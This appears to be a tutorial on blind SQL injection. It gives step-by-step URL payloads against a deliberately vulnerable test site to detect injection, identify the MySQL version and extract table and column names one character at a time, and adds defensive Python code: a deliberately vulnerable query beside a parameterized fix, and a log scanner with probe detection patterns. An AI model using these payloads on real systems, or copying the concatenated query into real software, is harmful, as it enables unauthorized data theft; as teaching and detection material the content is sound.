Blind SQL Injection – All things in moderation

Blind SQL Injection

I. Concept
Blind SQL Injection is one of the techniques used in SQL injection attacks. Blind SQL (Structured Query Language) injection is a type of SQL injection attack that asks the database true or false questions and determines the answer based on the application's response. It is typically used when the web application has been configured to show only generic error messages, but the code that is vulnerable to SQL injection has not been fixed.
A conventional SQL injection attack proceeds roughly as follows:
1. Find a target website.
2. Add a quote character (') to a parameter to see whether the site returns an SQL error.
3. Work out the number of rows and columns the query returns by varying the URL.
4. Extract data from the web application's database.
However, if the website has been configured so that errors are not returned, this approach gives no feedback: how do we know whether our injected condition was right or wrong? That is where Blind SQL Injection comes in.

II. How to perform a blind SQL injection attack?
Victim: 
http://testphp.vulnweb.com/listproducts.php?cat=2
1. Identify SQL injection:
The usual way is to add a metacharacter such as (') or (*) to a parameter in the URL.
However, if the site has been configured not to return errors, we cannot tell from an error message whether SQL injection is present.
When no error is displayed, we use a logical test instead. The original URL is a true condition, and the website displays the page as usual.

Boolean:
(true and true) = true
(true and false) = false
See the difference between the two following queries:
Ex1: http://testphp.vulnweb.com/listproducts.php?cat=2 and 1=1


=> Query true. Website displays as normal.

Ex2: http://testphp.vulnweb.com/listproducts.php?cat=2 and 1=2


=> Query false. Website displays differently.

In conclusion, the condition we injected into the URL has been processed by the DBMS (MySQL by default), and the difference between the two pages tells us whether it was true or false.
Now we start looking for other details.
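The boolean test above only works because the value of cat is pasted straight into the SQL text. The following added Python/sqlite3 example (not the article's code, and not the vulnerable site's real schema; the products table and its rows are constructed) reproduces that behaviour with a concatenated query and shows the type-validated, parameterized version that makes the "and 1=2" probe meaningless.

```python
import sqlite3


def make_db():
    """Constructed sample database standing in for a product listing
    (hypothetical schema, not the site's real one)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER, cat INTEGER, name TEXT)")
    conn.executemany(
        "INSERT INTO products VALUES (?, ?, ?)",
        [(1, 1, "hat"), (2, 2, "shirt"), (3, 2, "shoes")],
    )
    return conn


def list_products_vulnerable(conn, cat):
    """The defective pattern: the request parameter becomes part of the SQL
    text, so 'cat=2 and 1=2' turns the WHERE clause false and the page
    changes. Shown only for contrast with the safe version below."""
    sql = "SELECT name FROM products WHERE cat=" + cat + " ORDER BY id"
    return [row[0] for row in conn.execute(sql)]


def list_products_safe(conn, cat):
    """Hardened version: validate the type first, then bind the value as a
    parameter. The parameter can never be interpreted as SQL, so an injected
    condition is either rejected outright or treated as a literal value."""
    try:
        cat_id = int(cat)
    except (TypeError, ValueError):
        return None  # reject the request; the caller should answer HTTP 400
    rows = conn.execute(
        "SELECT name FROM products WHERE cat=? ORDER BY id", (cat_id,)
    )
    return [row[0] for row in rows]


if __name__ == "__main__":
    conn = make_db()
    # The true/false oracle the article describes, reproduced locally.
    print("vuln, and 1=1:", list_products_vulnerable(conn, "2 and 1=1"))
    print("vuln, and 1=2:", list_products_vulnerable(conn, "2 and 1=2"))
    # Same input against the parameterized query: rejected, no oracle.
    print("safe, and 1=2:", list_products_safe(conn, "2 and 1=2"))
    print("safe, 2      :", list_products_safe(conn, "2"))
```

The version probe in section 2 relies on the same mechanism; with sqlite3 the analogous condition would be substr(sqlite_version(),1,1)='3', which the concatenated query evaluates and the parameterized one rejects.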

2. Finding the version:
We can use "substring" to extract part of a string.
Here we only need to know whether the MySQL version in use is 4 or 5, so we take just the first character of the version string.
We use: substring(@@version,1,1)

Ex1: http://testphp.vulnweb.com/listproducts.php?cat=2 and substring(@@version,1,1)=4


=> Query false. Website displays differently.

Ex2: http://testphp.vulnweb.com/listproducts.php?cat=2 and substring(@@version,1,1)=5


=> Query true. Website displays normally.

From the results of the two queries we can conclude that the website is using MySQL version 5.

Now we continue looking for information about the tables and columns in the database.
First we guess the table name, starting from common names such as users, admin, login, etc.
Finding the table name:
http://testphp.vulnweb.com/listproducts.php?cat=1 and (SELECT 1 from admin)=1


http://testphp.vulnweb.com/listproducts.php?cat=1 and (SELECT 1 from users)=1


We can conclude that the database has a table named "users": the subquery against admin changed the page, while the subquery against users left it as normal.
For table names that are not common, we instead extract the name character by character using ASCII codes, as shown for column names below.

3. Finding column names
We have two scenarios here.
– Scenario 1: Guess the whole column name, as we did with the table name.
http://testphp.vulnweb.com/listproducts.php?cat=2 and (SELECT substring(concat(1,username),1,1) from users limit 0,1)=1

http://testphp.vulnweb.com/listproducts.php?cat=2 and (SELECT substring(concat(1,uname),1,1) from users limit 0,1)=1
Nothing wrong happens on our page with the column name "uname", so we can conclude that the table has a column named "uname". Do the same with other column names to retrieve the remaining column names.
– Scenario 2: Alternatively, we can guess the column name one character at a time.
We can guess each character exactly, or narrow down its range of ASCII codes.

http://testphp.vulnweb.com/listproducts.php?cat=2 and ascii(substring((select concat(column_name) from information_schema.columns where table_name=0x7573657273+limit 0,1),1,1))= 117
Here we guess the first character directly with the value 117; to find each character of the column name we try the printable range of ASCII codes (65 to 122).
Or we can compare against the character itself instead of its ASCII code.
http://testphp.vulnweb.com/listproducts.php?cat=2 and substring((select concat(column_name) from information_schema.columns where table_name=0x7573657273+limit 0,1),1,1)='u'

Alternatively, we can use the operators <, > or = to narrow down the column name.
http://testphp.vulnweb.com/listproducts.php?cat=2 and ascii(substring((select concat(column_name) from information_schema.columns where table_name=0x7573657273+limit 0,1),1,1))> 100
This checks whether the first character of the column name has an ASCII code higher than 100.
The page displays as usual, so the first character of the column name is higher than 100.
In this query:
– "limit" restricts the query output; here limit 0,1 returns exactly one row (limit 1 is equivalent).
– "concat" joins strings; here it simply wraps the column name.
– information_schema is a default database in MySQL that holds metadata about the other databases, tables and columns.
– table_name = 0x7573657273 means table_name = "users" (the hex encoding of the table name we found above).

Similarly, we query repeatedly to narrow down the range of the first character of the column name.
When the range is small enough, we try the exact values.
http://testphp.vulnweb.com/listproducts.php?cat=2 and ascii(substring((select concat(column_name) from information_schema.columns where table_name=0x7573657273+limit 0,1),2,1))= 117
Then we do the same for the 2nd character and onwards.

– To determine the length of a name, you can use a query such as:
www.vuln-web.com/photo.php?id=1' and (select 1 from dual where database() like '_____')%23 (we started from 5)

In this query: dual is a default dummy table in Oracle databases (MySQL also accepts FROM dual).
Each underscore ( _ ) in the LIKE pattern matches exactly one character, so the number of underscores is the length being tested (here, the length of the database name returned by database()).
When the web page displays normally, the guess is correct and we have the length of the name.
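Every probe in sections 1 to 3 leaves a distinctive trace in the web server's access log: the same client hitting the same script with "and 1=1" / "and 1=2", @@version, information_schema, ascii(substring(...)) conditions, and getting HTTP 200 with two different response sizes (the "true page" and the "false page"). The following added Python example (not the article's code; the log lines are constructed to mirror the article's probes, with RFC 5737 documentation addresses) flags such requests and picks out clients whose flagged requests to one script returned differing sizes, which is the boolean oracle itself.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed sample access-log lines in common log format (not real traffic).
SAMPLE_LOG = """\
203.0.113.5 - - [03/Aug/2016:10:00:01 +0000] "GET /listproducts.php?cat=2 HTTP/1.1" 200 5120
203.0.113.5 - - [03/Aug/2016:10:00:02 +0000] "GET /listproducts.php?cat=2%20and%201=1 HTTP/1.1" 200 5120
203.0.113.5 - - [03/Aug/2016:10:00:03 +0000] "GET /listproducts.php?cat=2%20and%201=2 HTTP/1.1" 200 1830
203.0.113.5 - - [03/Aug/2016:10:00:04 +0000] "GET /listproducts.php?cat=2%20and%20substring(@@version,1,1)=5 HTTP/1.1" 200 5120
203.0.113.5 - - [03/Aug/2016:10:00:05 +0000] "GET /listproducts.php?cat=2+and+ascii(substring((select+concat(column_name)+from+information_schema.columns+where+table_name=0x7573657273+limit+0,1),1,1))%3E+100 HTTP/1.1" 200 5120
198.51.100.7 - - [03/Aug/2016:10:00:06 +0000] "GET /listproducts.php?cat=1 HTTP/1.1" 200 4990
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<bytes>\d+)'
)

# Signatures of the boolean-based probes shown in this article, matched on the
# URL-decoded, lower-cased query string so that %20 and + encodings are covered.
PATTERNS = [
    ("boolean tautology/contradiction", re.compile(r"\b(?:and|or)\b\s+\d+\s*=\s*\d+")),
    ("version probe", re.compile(r"@@version|\bversion\s*\(")),
    ("schema enumeration", re.compile(r"information_schema")),
    ("character-at-a-time extraction", re.compile(r"\b(?:ascii|substring|substr)\s*\(")),
]


def classify(path):
    """Return the probe categories whose signature appears in the query string."""
    query = path.split("?", 1)[1] if "?" in path else ""
    decoded = unquote_plus(query).lower()
    return [label for label, rx in PATTERNS if rx.search(decoded)]


def scan(log_text):
    """Parse each line and keep the requests that carry at least one signature."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a parseable access-log line; skip it
        labels = classify(m["path"])
        if labels:
            hits.append({
                "ip": m["ip"], "path": m["path"], "status": int(m["status"]),
                "bytes": int(m["bytes"]), "labels": labels,
            })
    return hits


def probing_clients(log_text, min_probes=2):
    """Clients whose flagged requests to one script all succeeded (200) but
    came back in more than one size: the true-page/false-page difference the
    attacker is reading is visible to the defender as well."""
    sizes_by_client = defaultdict(list)
    for h in scan(log_text):
        if h["status"] == 200:
            script = h["path"].split("?", 1)[0]
            sizes_by_client[(h["ip"], script)].append(h["bytes"])
    return {
        ip for (ip, _), sizes in sizes_by_client.items()
        if len(sizes) >= min_probes and len(set(sizes)) > 1
    }


if __name__ == "__main__":
    for h in scan(SAMPLE_LOG):
        print(h["ip"], h["status"], h["bytes"], h["labels"])
    print("probing clients:", probing_clients(SAMPLE_LOG))
```

The signature list is deliberately narrow; in production it would sit beside the response-size signal rather than replace it, because the size difference catches probes whose syntax the patterns do not know, while the patterns catch probes that happen to hit pages of equal size.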

